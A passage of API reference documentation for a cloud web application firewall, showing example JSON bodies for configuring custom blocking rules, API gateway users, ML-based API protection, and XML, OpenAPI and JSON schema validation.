- "block_extensions": true,
- "max_frm_size": 64,
- "max_msg_size": 1024,
- "block_extentions": true,
- "block_attacks": true,
- "origin_list": [
- {
- "idx": 1,
- "origin": "org1"
}
]
}
]
}
}{- "detail": "Module updated"
}Get the configuration of custom rule.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "rule_list": [
- {
- "idx": 1,
- "name": "TEST",
- "challenge": "real-browser-enforcement",
- "action": "block-period",
- "block_period": 600,
- "filter_list": [
- {
- "idx": 1,
- "type": "source-ip-filter",
- "ip": "1.1.1.1-1.1.1.255",
- "reverse_match": true
}, - {
- "idx": 2,
- "type": "user-filter",
- "reverse_match": true,
- "username": "uname"
}, - {
- "idx": 3,
- "type": "url-filter",
- "url": "/url",
- "reverse_match": false
}, - {
- "idx": 4,
- "type": "parameter",
- "name": "para_name",
- "value": "para_value"
}, - {
- "idx": 5,
- "type": "http-header-filter",
- "header_check": true,
- "header_type": "predefined",
- "header_name": "Accept",
- "header_value": "test",
- "header_reverse_match": false,
- "method_check": true,
- "method_reverse_match": false,
- "method_value": "method"
}, - {
- "idx": 6,
- "type": "http-header-filter",
- "header_check": true,
- "header_type": "custom",
- "header_name": "aaa",
- "header_value": "test",
- "header_reverse_match": false,
- "method_check": false,
- "method_reverse_match": false,
- "method_value": "bbb"
}, - {
- "idx": 7,
- "type": "content-type",
- "content_types": [
- "application/xml",
- "text/xml"
]
}, - {
- "idx": 8,
- "type": "response-code",
- "code": "404"
}, - {
- "idx": 9,
- "type": "security-rules",
- "cross_site_scripting": true,
- "sql_injection": true,
- "generic_attacks": true,
- "known_exploits": true,
- "trojans": true
}, - {
- "idx": 10,
- "type": "access-limit-filter",
- "limit": 10
}, - {
- "idx": 11,
- "type": "packet-interval",
- "timeout": 2
}, - {
- "idx": 12,
- "type": "http-transaction",
- "timeout": 5
}, - {
- "idx": 13,
- "type": "occurrence",
- "occurrence": 1,
- "within": 1
}, - {
- "idx": 14,
- "type": "time-range-filter",
- "time_type": "daily",
- "start": "01:00",
- "end": "02:00"
}
]
}
]
}
}
}Update the configuration of custom rule.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (CustomRule) |
{- "template": false,
- "configs": {
- "status": true,
- "rule_list": [
- {
- "idx": 1,
- "name": "TEST",
- "challenge": "real-browser-enforcement",
- "action": "block-period",
- "block_period": 600,
- "filter_list": [
- {
- "idx": 1,
- "type": "source-ip-filter",
- "ip": "1.1.1.1-1.1.1.255",
- "reverse_match": true
}, - {
- "idx": 2,
- "type": "user-filter",
- "reverse_match": true,
- "username": "uname"
}, - {
- "idx": 3,
- "type": "url-filter",
- "url": "/url",
- "reverse_match": false
}, - {
- "idx": 4,
- "type": "parameter",
- "name": "para_name",
- "value": "para_value"
}, - {
- "idx": 5,
- "type": "http-header-filter",
- "header_check": true,
- "header_type": "predefined",
- "header_name": "Accept",
- "header_value": "test",
- "header_reverse_match": false,
- "method_check": true,
- "method_reverse_match": false,
- "method_value": "method"
}, - {
- "idx": 6,
- "type": "http-header-filter",
- "header_check": true,
- "header_type": "custom",
- "header_name": "aaa",
- "header_value": "test",
- "header_reverse_match": false,
- "method_check": false,
- "method_reverse_match": false,
- "method_value": "bbb"
}, - {
- "idx": 7,
- "type": "content-type",
- "content_types": [
- "application/xml",
- "text/xml"
]
}, - {
- "idx": 8,
- "type": "response-code",
- "code": "404"
}, - {
- "idx": 9,
- "type": "security-rules",
- "cross_site_scripting": true,
- "sql_injection": true,
- "generic_attacks": true,
- "known_exploits": true,
- "trojans": true
}, - {
- "idx": 10,
- "type": "access-limit-filter",
- "limit": 10
}, - {
- "idx": 11,
- "type": "packet-interval",
- "timeout": 2
}, - {
- "idx": 12,
- "type": "http-transaction",
- "timeout": 5
}, - {
- "idx": 13,
- "type": "occurrence",
- "occurrence": 1,
- "within": 1
}, - {
- "idx": 14,
- "type": "time-range-filter",
- "time_type": "daily",
- "start": "01:00",
- "end": "02:00"
}
]
}
]
}
}{- "detail": "Module updated"
}Get the configuration of custom rule of the template.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| template_id required | string Example: {{template_id}} The template ID. |
{- "result": {
- "configs": {
- "status": true,
- "rule_list": [
- {
- "idx": 1,
- "name": "TEST",
- "challenge": "real-browser-enforcement",
- "action": "block-period",
- "block_period": 600,
- "filter_list": [
- {
- "idx": 1,
- "type": "source-ip-filter",
- "ip": "1.1.1.1-1.1.1.255",
- "reverse_match": true
}, - {
- "idx": 2,
- "type": "user-filter",
- "reverse_match": true,
- "username": "uname"
}, - {
- "idx": 3,
- "type": "url-filter",
- "url": "/url",
- "reverse_match": false
}, - {
- "idx": 4,
- "type": "parameter",
- "name": "para_name",
- "value": "para_value"
}, - {
- "idx": 5,
- "type": "http-header-filter",
- "header_check": true,
- "header_type": "predefined",
- "header_name": "Accept",
- "header_value": "test",
- "header_reverse_match": false,
- "method_check": true,
- "method_reverse_match": false,
- "method_value": "method"
}, - {
- "idx": 6,
- "type": "http-header-filter",
- "header_check": true,
- "header_type": "custom",
- "header_name": "aaa",
- "header_value": "test",
- "header_reverse_match": false,
- "method_check": false,
- "method_reverse_match": false,
- "method_value": "bbb"
}, - {
- "idx": 7,
- "type": "content-type",
- "content_types": [
- "application/xml",
- "text/xml"
]
}, - {
- "idx": 8,
- "type": "response-code",
- "code": "404"
}, - {
- "idx": 9,
- "type": "security-rules",
- "cross_site_scripting": true,
- "sql_injection": true,
- "generic_attacks": true,
- "known_exploits": true,
- "trojans": true
}, - {
- "idx": 10,
- "type": "access-limit-filter",
- "limit": 10
}, - {
- "idx": 11,
- "type": "packet-interval",
- "timeout": 2
}, - {
- "idx": 12,
- "type": "http-transaction",
- "timeout": 5
}, - {
- "idx": 13,
- "type": "occurrence",
- "occurrence": 1,
- "within": 1
}, - {
- "idx": 14,
- "type": "time-range-filter",
- "time_type": "daily",
- "start": "01:00",
- "end": "02:00"
}
]
}
]
}
}
}Update the configuration of custom rule of the template.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| template_id required | string Example: {{template_id}} The template ID. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (CustomRule) |
{- "configs": {
- "status": true,
- "rule_list": [
- {
- "idx": 1,
- "name": "TEST",
- "challenge": "real-browser-enforcement",
- "action": "block-period",
- "block_period": 600,
- "filter_list": [
- {
- "idx": 1,
- "type": "source-ip-filter",
- "ip": "1.1.1.1-1.1.1.255",
- "reverse_match": true
}, - {
- "idx": 2,
- "type": "user-filter",
- "reverse_match": true,
- "username": "uname"
}, - {
- "idx": 3,
- "type": "url-filter",
- "url": "/url",
- "reverse_match": false
}, - {
- "idx": 4,
- "type": "parameter",
- "name": "para_name",
- "value": "para_value"
}, - {
- "idx": 5,
- "type": "http-header-filter",
- "header_check": true,
- "header_type": "predefined",
- "header_name": "Accept",
- "header_value": "test",
- "header_reverse_match": false,
- "method_check": true,
- "method_reverse_match": false,
- "method_value": "method"
}, - {
- "idx": 6,
- "type": "http-header-filter",
- "header_check": true,
- "header_type": "custom",
- "header_name": "aaa",
- "header_value": "test",
- "header_reverse_match": false,
- "method_check": false,
- "method_reverse_match": false,
- "method_value": "bbb"
}, - {
- "idx": 7,
- "type": "content-type",
- "content_types": [
- "application/xml",
- "text/xml"
]
}, - {
- "idx": 8,
- "type": "response-code",
- "code": "404"
}, - {
- "idx": 9,
- "type": "security-rules",
- "cross_site_scripting": true,
- "sql_injection": true,
- "generic_attacks": true,
- "known_exploits": true,
- "trojans": true
}, - {
- "idx": 10,
- "type": "access-limit-filter",
- "limit": 10
}, - {
- "idx": 11,
- "type": "packet-interval",
- "timeout": 2
}, - {
- "idx": 12,
- "type": "http-transaction",
- "timeout": 5
}, - {
- "idx": 13,
- "type": "occurrence",
- "occurrence": 1,
- "within": 1
}, - {
- "idx": 14,
- "type": "time-range-filter",
- "time_type": "daily",
- "start": "01:00",
- "end": "02:00"
}
]
}
]
}
}{- "detail": "Module updated"
}Get the configuration of mobile API protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "token_secret": "test_token",
- "token_header": "Jwt-Token",
- "url_list": [
- {
- "idx": 1,
- "url": "/url1"
}, - {
- "idx": 2,
- "url": "/url2"
}
]
}
}
}Update the configuration of mobile API protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (MobileAPIProtection) |
{- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "token_secret": "test_token",
- "token_header": "Jwt-Token",
- "url_list": [
- {
- "idx": 1,
- "url": "/url1"
}, - {
- "idx": 2,
- "url": "/url2"
}
]
}
}{- "detail": "Module updated"
}Get the configuration of API gateway policy.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "user_list": [
- {
- "idx": 1,
- "name": "test_user",
- "email": "test@test.com",
- "comments": "test user",
- "ip_list": [
- {
- "idx": 1,
- "ip": "1.1.1.1"
}
], - "referer_list": [
- {
- "idx": 1,
- "referer": "referer1"
}
], - "uuid": "2858b0d0-abb9-11ec-a6ca-b694bf1ae8ed",
- "api_key": "4DxCGdrr7imTJOCW05ng2ixKV7Qs0UB3mk0mYcA4",
- "create_time": "2022-03-24 21:27:07"
}
], - "rule_list": [
- {
- "idx": 1,
- "name": "test_rule",
- "api_key_verify": true,
- "rate_limit_period": 1,
- "rate_limit_req": 10,
- "url_list": [
- {
- "idx": 1,
- "frontend": "/front",
- "backend": "/back"
}
], - "api_key_loc": "http-header",
- "field_name": "API_KEY",
- "user_list": [
- "test_user"
]
}
]
}
}
}Update the configuration of API gateway policy.
To add a new API user, a sample body is added to the request that conforms to the following JSON schema:
"api_user": [
{
"name": "user1",
"email": "user1@sina.com",
"comments": "user1",
"ip-access-list": ["1.1.1.1"],
"http-referer-list": ["www.sina.com"]
},
]
To add a new API policy, a sample body is added to the request that conforms to the following JSON schema:
"api_policy": [
{
"api-key-verification": "enable",
"api-key-location": "http-header",
"match-url-prefixes": [
{
"frontend-prefix": "/front_prefix",
"backend-prefix": "/back_prefix"
}
],
"api-user-list": ["he"],
"rate-limit-period": 1,
"rate-limit-requests": 60,
"name": "rule1",
"header-field-name": "header1"
},
]
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (APIGateway) |
{- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "user_list": [
- {
- "idx": 1,
- "name": "test_user",
- "email": "test@test.com",
- "comments": "test user",
- "ip_list": [
- {
- "idx": 1,
- "ip": "1.1.1.1"
}
], - "referer_list": [
- {
- "idx": 1,
- "referer": "referer1"
}
], - "uuid": "2858b0d0-abb9-11ec-a6ca-b694bf1ae8ed",
- "api_key": "4DxCGdrr7imTJOCW05ng2ixKV7Qs0UB3mk0mYcA4",
- "create_time": "2022-03-24 21:27:07"
}
], - "rule_list": [
- {
- "idx": 1,
- "name": "test_rule",
- "api_key_verify": true,
- "rate_limit_period": 1,
- "rate_limit_req": 10,
- "url_list": [
- {
- "idx": 1,
- "frontend": "/front",
- "backend": "/back"
}
], - "api_key_loc": "http-header",
- "field_name": "API_KEY",
- "user_list": [
- "test_user"
]
}
]
}
}{- "detail": "Module updated"
}Get the configuration of ML baased API protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "threat_action": "alert_deny",
- "ip_list_type": "Block",
- "path_list": [
- {
- "idx": 1,
- "type": "plain",
- "pattern": "/url1"
}, - {
- "idx": 2,
- "type": "regular",
- "pattern": "/url.*"
}
], - "ip_list": [
- {
- "idx": 1,
- "ip": "1.1.1.1"
}
]
}
}
}Update the configuration of ML baased API protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (MlApiProtection) |
{- "template": false,
- "configs": {
- "status": true,
- "threat_action": "alert_deny",
- "ip_list_type": "Block",
- "ip_list": [
- {
- "idx": 1,
- "ip": "1.1.1.1"
}
], - "path_list": [
- {
- "idx": 1,
- "type": "plain",
- "pattern": "/1"
}
]
}
}{- "detail": "Module updated"
}Get the URL Path Configuration of ML Based API Protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| page | integer Page number, needed only at get API Path List. |
| size | integer Page size, needed only at get API Path List. |
| url | string URL path of API model, required when get API Path detail. |
| url_md5 | string MD5 of URL path which returned in get API Path List, required when get API Path detail. |
| period | string Enum: "1day" "7day" Attack statistics period, '1day' or '7day'. |
| search | string fuzzy search keyword. |
{- "result": [
- {
- "id": 1,
- "rule_id": 126,
- "dbid": 4,
- "url_id": 1,
- "path": "/autotest/mltest1.json",
- "method": "post",
- "status": "model running",
- "url_md5": "2C91C1D20D169510",
- "category": [
- "\"internet\"",
- "\"personalinfo\"",
- "\"address\""
], - "threat_action": "disable",
- "schema_action": "standby",
- "block": 273,
- "monitor": 0
}, - {
- "id": 2,
- "rule_id": 126,
- "dbid": 4,
- "url_id": 2,
- "path": "/autotest/mltest2.json",
- "method": "post",
- "status": "model confirmed",
- "url_md5": "30CB10EC3A800911",
- "category": [
- "\"internet\"",
- "\"personalinfo\"",
- "\"address\""
], - "threat_action": "alert",
- "schema_action": "standby",
- "block": 0,
- "monitor": 12
}
], - "total": 2
}Refresh URL path of ML based API protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| url_md5 | string The MD5 of URL path which returned in response of GET request |
{- "url_md5": "815CB933D5EAD413"
}{- "detail": "Module updated"
}Update URL path of ML based API protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| url_md5 | string The MD5 of URL path which returned in response of GET request |
object (UrlPathParam) |
{- "url_md5": "815CB933D5EAD413",
- "data": {
- "method": "post",
- "action": "alert_deny"
}
}{- "detail": "Module updated"
}Update URL path model of ML based API protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| url_md5 | string The MD5 of URL path which returned in response of GET request |
object (UrlModel) |
{- "url_md5": "815CB933D5EAD413",
- "data": {
- "model": {
- "name": "test",
- "in": "query",
- "required": true,
- "description": "test",
- "schema": {
- "type": "string",
- "maxLength": 1,
- "minLength": 1
}
}, - "type": 1
}
}{- "detail": "Module updated"
}Get the schema file of ML Based API Protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "json": {
- "info": {
- "description": "Automatically generated by APID",
- "title": "API",
- "version": "3.0.3"
}, - "openapi": "3.0.3",
- "paths": {
- "/api/v2/FTNT/Cloud2": {
- "post": {
- "parameters": [
- {
- "description": "",
- "in": "query",
- "name": "mail",
- "required": true,
- "schema": {
- "type": "string",
- "maxLength": 20,
- "minLength": 20,
- "format": "email"
}
}
], - "requestBody": {
- "content": {
- "application/json": {
- "schema": {
- "properties": {
- "address": {
- "type": "string",
- "maxLength": 37,
- "minLength": 29
}
}, - "type": "object",
- "required": [
- "address"
]
}
}
}, - "description": "request body"
}, - "responses": {
- "200": {
- "content": {
- "application/json": {
- "schema": {
- "properties": {
- "ip": {
- "type": "string",
- "maxLength": 15,
- "minLength": 10,
- "format": "ipv4"
}
}, - "type": "object",
- "required": [
- "ip"
]
}
}
}, - "description": "response body"
}
}, - "url_id": 2
}
}
}
}, - "yaml": [
- "info:",
- " description: Automatically generated by APID",
- " title: API",
- " version: 3.0.3",
- "openapi: 3.0.3",
- "paths:",
- " /api/v2/FTNT/Cloud2:",
- " post:",
- " parameters:",
- " - description: ''",
- " in: query",
- " name: mail",
- " required: true",
- " schema:",
- " format: email",
- " maxLength: 20",
- " minLength: 20",
- " type: string",
- " requestBody:",
- " content:",
- " application/json:",
- " schema:",
- " properties:",
- " address:",
- " maxLength: 37",
- " minLength: 29",
- " type: string",
- " required:",
- " - address",
- " type: object",
- " description: request body",
- " responses:",
- " '200':",
- " content:",
- " application/json:",
- " schema:",
- " properties:",
- " ip:",
- " format: ipv4",
- " maxLength: 15",
- " minLength: 10",
- " type: string",
- " required:",
- " - ip",
- " type: object",
- " description: response body",
- " url_id: 2"
], - "yaml_str": "[\"info:\", \" description: Automatically generated by APID\", \" title: API\", \" version: 3.0.3\", \"openapi: 3.0.3\", \"paths:\", \" /api/v2/FTNT/Cloud2:\", \" post:\", \" parameters:\", \" - description: ''\", \" in: query\", \" name: mail\", \" required: true\", \" schema:\", \" format: email\", \" maxLength: 20\", \" minLength: 20\", \" type: string\", \" requestBody:\", \" content:\", \" application/json:\", \" schema:\", \" properties:\", \" address:\", \" maxLength: 37\", \" minLength: 29\", \" type: string\", \" required:\", \" - address\", \" type: object\", \" description: request body\", \" responses:\", \" '200':\", \" content:\", \" application/json:\", \" schema:\", \" properties:\", \" ip:\", \" format: ipv4\", \" maxLength: 15\", \" minLength: 10\", \" type: string\", \" required:\", \" - ip\", \" type: object\", \" description: response body\", \" url_id: 2\"]"
}
}Get the configuration JSON/YAML file of ML Based API Protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| type | string Enum: "yaml" "json" File format, 'yaml' or 'json'. |
| url_md5 | string MD5 of selected API path which returned in response of GET URL Path request. If empty, all data is downloaded. There can be multiple values, separated by commas. |
{- "result": {
- "info": {
- "description": "Automatically generated by APID",
- "title": "API",
- "version": "3.0.3"
}, - "openapi": "3.0.3",
- "paths": {
- "/api/v2/FTNT/Cloud2": {
- "post": {
- "parameters": [
- {
- "description": "",
- "in": "query",
- "name": "mail",
- "required": true,
- "schema": {
- "type": "string",
- "maxLength": 20,
- "minLength": 20,
- "format": "email"
}
}
], - "requestBody": {
- "content": {
- "application/json": {
- "schema": {
- "properties": {
- "address": {
- "type": "string",
- "maxLength": 37,
- "minLength": 29
}
}, - "type": "object",
- "required": [
- "address"
]
}
}
}, - "description": "request body"
}, - "responses": {
- "200": {
- "content": {
- "application/json": {
- "schema": {
- "properties": {
- "ip": {
- "type": "string",
- "maxLength": 15,
- "minLength": 10,
- "format": "ipv4"
}
}, - "type": "object",
- "required": [
- "ip"
]
}
}
}, - "description": "response body"
}
}
}
}
}
}
}Get the timeline of ML Based API Protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| period | string Enum: "1day" "7day" Attack statistics period, '1day' or '7day'. |
| url | string URL path of API model. |
| method | string Request method of API model. |
| type | string Enum: "all" "schema" "threat" Protection type to be used for filtering timeline data. |
| parameter | string Prarameter name of API model, required when get timeline of parameter. |
[- {
- "line_name": "Block",
- "numbers": [
- {
- "id": 0,
- "time": 1686853800000,
- "line_number": 12
}, - {
- "id": 1,
- "time": 1686855600000,
- "line_number": 0
}, - {
- "id": 2,
- "time": 1686857400000,
- "line_number": 0
}, - {
- "id": 3,
- "time": 1686859200000,
- "line_number": 7
}, - {
- "id": 4,
- "time": 1686861000000,
- "line_number": 0
}, - {
- "id": 5,
- "time": 1686862800000,
- "line_number": 0
}, - {
- "id": 6,
- "time": 1686864600000,
- "line_number": 0
}, - {
- "id": 7,
- "time": 1686866400000,
- "line_number": 0
}, - {
- "id": 8,
- "time": 1686868200000,
- "line_number": 0
}, - {
- "id": 9,
- "time": 1686870000000,
- "line_number": 4
}, - {
- "id": 10,
- "time": 1686871800000,
- "line_number": 0
}, - {
- "id": 11,
- "time": 1686873600000,
- "line_number": 0
}, - {
- "id": 12,
- "time": 1686875400000,
- "line_number": 5
}, - {
- "id": 13,
- "time": 1686877200000,
- "line_number": 0
}, - {
- "id": 14,
- "time": 1686879000000,
- "line_number": 0
}, - {
- "id": 15,
- "time": 1686880800000,
- "line_number": 0
}, - {
- "id": 16,
- "time": 1686882600000,
- "line_number": 0
}, - {
- "id": 17,
- "time": 1686884400000,
- "line_number": 0
}, - {
- "id": 18,
- "time": 1686886200000,
- "line_number": 0
}, - {
- "id": 19,
- "time": 1686888000000,
- "line_number": 0
}, - {
- "id": 20,
- "time": 1686889800000,
- "line_number": 0
}, - {
- "id": 21,
- "time": 1686891600000,
- "line_number": 0
}, - {
- "id": 22,
- "time": 1686893400000,
- "line_number": 0
}, - {
- "id": 23,
- "time": 1686895200000,
- "line_number": 0
}, - {
- "id": 24,
- "time": 1686897000000,
- "line_number": 0
}, - {
- "id": 25,
- "time": 1686898800000,
- "line_number": 0
}, - {
- "id": 26,
- "time": 1686900600000,
- "line_number": 0
}, - {
- "id": 27,
- "time": 1686902400000,
- "line_number": 0
}, - {
- "id": 28,
- "time": 1686904200000,
- "line_number": 0
}, - {
- "id": 29,
- "time": 1686906000000,
- "line_number": 0
}, - {
- "id": 30,
- "time": 1686907800000,
- "line_number": 0
}, - {
- "id": 31,
- "time": 1686909600000,
- "line_number": 0
}, - {
- "id": 32,
- "time": 1686911400000,
- "line_number": 0
}, - {
- "id": 33,
- "time": 1686913200000,
- "line_number": 0
}, - {
- "id": 34,
- "time": 1686915000000,
- "line_number": 0
}, - {
- "id": 35,
- "time": 1686916800000,
- "line_number": 0
}, - {
- "id": 36,
- "time": 1686918600000,
- "line_number": 0
}, - {
- "id": 37,
- "time": 1686920400000,
- "line_number": 0
}, - {
- "id": 38,
- "time": 1686922200000,
- "line_number": 0
}, - {
- "id": 39,
- "time": 1686924000000,
- "line_number": 0
}, - {
- "id": 40,
- "time": 1686925800000,
- "line_number": 0
}, - {
- "id": 41,
- "time": 1686927600000,
- "line_number": 0
}, - {
- "id": 42,
- "time": 1686929400000,
- "line_number": 0
}, - {
- "id": 43,
- "time": 1686931200000,
- "line_number": 0
}, - {
- "id": 44,
- "time": 1686933000000,
- "line_number": 0
}, - {
- "id": 45,
- "time": 1686934800000,
- "line_number": 0
}, - {
- "id": 46,
- "time": 1686936600000,
- "line_number": 0
}, - {
- "id": 47,
- "time": 1686938400000,
- "line_number": 0
}, - {
- "id": 48,
- "time": 1686940200000,
- "line_number": 0
}
]
}, - {
- "line_name": "Monitor",
- "numbers": [
- {
- "id": 0,
- "time": 1686853800000,
- "line_number": 0
}, - {
- "id": 1,
- "time": 1686855600000,
- "line_number": 0
}, - {
- "id": 2,
- "time": 1686857400000,
- "line_number": 0
}, - {
- "id": 3,
- "time": 1686859200000,
- "line_number": 0
}, - {
- "id": 4,
- "time": 1686861000000,
- "line_number": 0
}, - {
- "id": 5,
- "time": 1686862800000,
- "line_number": 0
}, - {
- "id": 6,
- "time": 1686864600000,
- "line_number": 0
}, - {
- "id": 7,
- "time": 1686866400000,
- "line_number": 0
}, - {
- "id": 8,
- "time": 1686868200000,
- "line_number": 0
}, - {
- "id": 9,
- "time": 1686870000000,
- "line_number": 0
}, - {
- "id": 10,
- "time": 1686871800000,
- "line_number": 0
}, - {
- "id": 11,
- "time": 1686873600000,
- "line_number": 0
}, - {
- "id": 12,
- "time": 1686875400000,
- "line_number": 0
}, - {
- "id": 13,
- "time": 1686877200000,
- "line_number": 0
}, - {
- "id": 14,
- "time": 1686879000000,
- "line_number": 0
}, - {
- "id": 15,
- "time": 1686880800000,
- "line_number": 0
}, - {
- "id": 16,
- "time": 1686882600000,
- "line_number": 0
}, - {
- "id": 17,
- "time": 1686884400000,
- "line_number": 0
}, - {
- "id": 18,
- "time": 1686886200000,
- "line_number": 0
}, - {
- "id": 19,
- "time": 1686888000000,
- "line_number": 0
}, - {
- "id": 20,
- "time": 1686889800000,
- "line_number": 0
}, - {
- "id": 21,
- "time": 1686891600000,
- "line_number": 0
}, - {
- "id": 22,
- "time": 1686893400000,
- "line_number": 0
}, - {
- "id": 23,
- "time": 1686895200000,
- "line_number": 0
}, - {
- "id": 24,
- "time": 1686897000000,
- "line_number": 0
}, - {
- "id": 25,
- "time": 1686898800000,
- "line_number": 0
}, - {
- "id": 26,
- "time": 1686900600000,
- "line_number": 0
}, - {
- "id": 27,
- "time": 1686902400000,
- "line_number": 0
}, - {
- "id": 28,
- "time": 1686904200000,
- "line_number": 0
}, - {
- "id": 29,
- "time": 1686906000000,
- "line_number": 0
}, - {
- "id": 30,
- "time": 1686907800000,
- "line_number": 0
}, - {
- "id": 31,
- "time": 1686909600000,
- "line_number": 0
}, - {
- "id": 32,
- "time": 1686911400000,
- "line_number": 0
}, - {
- "id": 33,
- "time": 1686913200000,
- "line_number": 0
}, - {
- "id": 34,
- "time": 1686915000000,
- "line_number": 0
}, - {
- "id": 35,
- "time": 1686916800000,
- "line_number": 0
}, - {
- "id": 36,
- "time": 1686918600000,
- "line_number": 0
}, - {
- "id": 37,
- "time": 1686920400000,
- "line_number": 0
}, - {
- "id": 38,
- "time": 1686922200000,
- "line_number": 0
}, - {
- "id": 39,
- "time": 1686924000000,
- "line_number": 0
}, - {
- "id": 40,
- "time": 1686925800000,
- "line_number": 0
}, - {
- "id": 41,
- "time": 1686927600000,
- "line_number": 0
}, - {
- "id": 42,
- "time": 1686929400000,
- "line_number": 0
}, - {
- "id": 43,
- "time": 1686931200000,
- "line_number": 0
}, - {
- "id": 44,
- "time": 1686933000000,
- "line_number": 0
}, - {
- "id": 45,
- "time": 1686934800000,
- "line_number": 0
}, - {
- "id": 46,
- "time": 1686936600000,
- "line_number": 0
}, - {
- "id": 47,
- "time": 1686938400000,
- "line_number": 0
}, - {
- "id": 48,
- "time": 1686940200000,
- "line_number": 0
}
]
}
]Get the configuration of XML protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "bucket": "bucket-name",
- "prefix": "2512018171/18",
- "file_list": [
- {
- "idx": 1,
- "name": "test-rule1",
- "url": "/1",
- "limit_check": true,
- "entity_check": true,
- "schema_valid": true,
- "filename": "x_schema.xsd",
- "md5": "c0be3e2fe6733ec9d5c14cad158db66e"
}
]
}
}
}Update the configuration of XML protection.
The data format in the request is multipart/form-data. Refer to the Request body for more detail information
The keywords of the form are template_status, _status, action, XMLProtectionPolicy.
The keyword format of the uploaded file is: the prefix file_ + the name of each rule, for example, file_test_xml_01.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (XMLProtection) |
| property name* additional property | any |
{- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "file_list": [
- {
- "idx": 1,
- "name": "test-rule1",
- "url": "/1",
- "limit_check": true,
- "entity_check": true,
- "schema_valid": true,
- "filename": "x_schema.xsd"
}
]
}, - "file_test-rule1": "{binary}"
}{- "detail": "Module updated"
}Get the configuration of OpenAPI validation policy.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "bucket": "bucket-name",
- "prefix": "2512018171/10",
- "file_list": [
- {
- "idx": 1,
- "name": "petstore.yaml",
- "md5": "40b9ed5d76ff847940facc24df43498e",
- "title": "Swagger Petstore",
- "desc": "Description",
}
]
}
}
}Update the configuration of OpenAPI validation policy.
The data format in the request is multipart/form-data. Refer to the Request body for more detail information
The keywords of the form are template_status, _status, action, OpenAPIValidationPolicy.
The keyword format of the uploaded file is: the prefix file_ + the array index of each rule, for example, file_1.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (ApiProtection) |
| property name* additional property | any |
{- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "file_list": [
- {
- "idx": 1,
- "name": "petstore.yaml"
}
]
}, - "file_1": "{binary}"
}{- "detail": "Module updated"
}Get the configuration of JSON protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "bucket": "bucket-name",
- "prefix": "2512018171/37",
- "file_list": [
- {
- "idx": 1,
- "name": "test_rule1",
- "url": "/1",
- "limit_check": true,
- "schema_valid": true,
- "filename": "json_schema.json",
- "md5": "e1353ba1774557f39668087564da3812"
}
]
}
}
}Update the configuration of JSON protection.
The data format in the request is multipart/form-data. Refer to the Request body for more detail information
The keywords of the form are template_status, _status, action, jsonsecuritypolicy.
The keyword format of the uploaded file is: the prefix file_ + the name of each rule, for example, file_test1.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
